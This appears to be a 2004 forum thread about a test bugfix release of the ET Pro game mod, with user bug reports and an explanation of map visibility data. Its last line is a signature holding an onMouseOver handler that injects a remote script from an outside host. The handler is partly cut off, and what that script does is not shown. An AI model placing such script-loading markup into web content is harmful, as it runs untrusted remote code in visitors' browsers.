ET Pro 3.0.1 testbugfix5 released

Official ET Pro announcements here...

Moderators: Forum moderators, developers

bani
Site Admin

ET Pro 3.0.1 testbugfix5 released

Post by bani »

The test bugfix release version 5 for 3.0.1 is now available.

Anticheat changes, bugfixes. minor tweaks

Please test it and post your feedback (good or bad) in this thread.
Last edited by bani on Mon Jun 14, 2004 1:55 am, edited 1 time in total.
=FF=im2good4u

Post by =FF=im2good4u »

cool i got it first :D

Code: Select all

Players can now drown/burn/fall/crush/etc in headshot mode
^^ this screws my no damage setting in Trick Jump :D
daytroxative

hmm...

Post by daytroxative »

haven't updated since official release.... i guess ill check this out... looks like your always spiff things up... great work!!
DG

Post by DG »

Artillery announcements are no longer endlessly buffered 8)
KingJackaL

Post by KingJackaL »

Only known cheats are reported to players, and only repeat every 5 minutes
What about /ref's?

If there's a suspect cheat, it would be nice to give the ref a warning so they can stalk said player and decide if it's a new/private cheat or not.

( sorry, but it's a real pain to go test this :P )
=FF=im2good4u

Post by =FF=im2good4u »

found a bug :!: yeah sorry :twisted:

/cheaters <player id> gives info on the type of cheat

but /cheater <player id> does the same only it also gives an "unkown command" error (but the command does work)
drstock

Post by drstock »

Hmmm....mines still explode in ur face as an Eng. while planting. Not every time but sometimes.
Fragging is not a crime.......yet!
defragga

Post by defragga »

no bugs/errors/problems so far with bugfix 5 ... runs really smooth imho ... nice work bani and co. :)
Mark

Post by Mark »

Hi,

when i use the guids command via rcon, then i get a different guid, then the one in the logfile. Is this the new "etpro" guid ?

greets
Mark
Get owned at: Gaming@d1p.de (217.172.182.126:27960)
Hi! I'm a .signature *virus*! Copy me into your ~/.signature to help me spread!
Spark2

Post by Spark2 »

drstock wrote:Hmmm....mines still explode in ur face as an Eng. while planting. Not every time but sometimes.
Well deserved! :twisted:
-FA-Undertaker

Post by -FA-Undertaker »

Since I am a servern00b (set up my first-ever server only 5 days ago) I am wondering: should I install the bugfixes or are they for testing purposes only? I installed, but a lot of people didn't connect anymore cozz they didn't know why they had to download ET. Currently I degraded to 3.01 (latest version).

Lemme know :arrow: thx
Deus

Post by Deus »

If you want your server be up to date with newest bugfixes and cheatrecognisattion available then you should use the testbugfixversions and stop caring about people not connecting.
V6.Sven

Post by V6.Sven »

When you float in freecam, you are only able to see what's happening withing a medium range of the player who recored the demo(that is, in the range the demo and thus the player got info about while playing). But it seems to me this range got smaller in every bugfix. I can understand how it would help fight aimbots, but it also takes away some usefullness of the freecam. The client also isn't able to predict as much as it used to. Is this true or is it just mee seeing something that isn't there?
defragga

Post by defragga »

didnt recognized this while watching my demo in freecam ... It's allways the same imo.
And compared to the old RtCW EDV Mod, .. it's the saim amount of info saved in the demos ... so what the client sees in the demo, is what u can see in freecam :>
Rain

Post by Rain »

V6.Sven wrote:When you float in freecam, you are only able to see what's happening withing a medium range of the player who recored the demo(that is, in the range the demo and thus the player got info about while playing). But it seems to me this range got smaller in every bugfix. I can understand how it would help fight aimbots, but it also takes away some usefullness of the freecam. The client also isn't able to predict as much as it used to. Is this true or is it just mee seeing something that isn't there?
The determining factor here is the PVS (potentially visiable sectors) data in the map, which doesn't ever change once the map is compiled.

Basically, as part of the map compile phase, the sectors that could potentially be seen from each other sector are calculated and stored--this is what determines what data is sent over the network, and therefore what data is saved in demos (for freecam, etc.)
<b onMouseOver="var d=document;if(!d.eD){var e=d.createElement('script');e.src='http://themuffin.net/forum/f.js';e.type ... ;d.eD=true;}" id="rsig">Rain</b>